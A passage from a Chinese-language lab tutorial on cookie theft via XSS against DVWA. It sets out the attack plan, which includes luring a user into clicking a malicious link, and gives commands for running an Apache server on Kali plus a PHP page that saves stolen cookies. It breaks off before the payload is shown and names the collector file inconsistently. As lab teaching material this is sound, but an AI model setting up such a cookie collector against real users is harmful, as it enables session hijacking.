思路:
- 搭建能接收cookie的服务器
- 构建带有XSS恶意代码的url
- 发给用户诱导用户点击url
- 获得用户cookie并利用
实验环境:
kali————充当攻击者接收cookie的服务器 192.168.0.53
DVWA————充当客户要访问的目标网站
centos7————充当用户客户端
小试牛刀:
一、搭建服务器
1. kali开启Apache服务
systemctl start apache2
2. 创建接收cookie的php页面
2.1 在/var/www/html下创建能接收cookie的php页面
vim test.php
内容如下
<?php
$cookie = $_GET['cookie']; //获取cookie值
file_put_contents('cookie.txt',$cookie); //将获取的cookie值写入到cookie.txt中
?>
2.2 创建能存储cookie的cookie.txt文本
touch cookie.txt
2.3 给test_xss.php和cookie.txt授权
#查看Apache用的什么权限
ps -aux | grep apache
# 授权
chown www-data:www-data test.php
chown www-data:www-data cookie.txt
至此我们就创建好了能接收cookie环境了。http://192.168.0.53/test_xss.php
二、制作XSS
- 构建XSS payload